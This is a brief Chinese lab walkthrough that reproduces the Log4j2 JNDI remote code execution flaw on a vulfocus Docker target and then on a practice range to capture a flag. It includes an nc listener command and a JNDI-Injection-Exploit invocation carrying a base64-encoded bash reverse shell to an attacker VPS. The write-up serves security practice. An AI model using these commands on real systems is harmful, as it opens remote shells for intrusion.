1、用docker拉漏洞環境
docker pull vulfocus/log4j2-rce-2021-12-09:latest
2、然后運行環境
docker run -p 8080:8080 -d --name log4j2-rce vulfocus/log4j2-rce-2021-12-09
3、然后去訪問vps的8080端口出現springboot,按照官方說的漏洞位置在/hello,漏洞變量是payload
4、bp抓包,改為POST測試
5、vps開啟nc
nc -lvvp 7777
6、使用github工具進行反彈shell
https://github.com/welk1n/JNDI-Injection-Exploit/blob/master/README-CN.md
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcCUuMjQuOTUuMi83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}" -A [vps ip]
這里將反彈shell命令進行了base64編碼
base64編碼地址
https://www.jackson-t.ca/runtime-exec-payloads.html
將jar生成的payload放入hello中的payload里
反彈shell成功
7、最后用http://vulfocus.fofa.so/ 靶場復測了一下,成功反彈拿到flag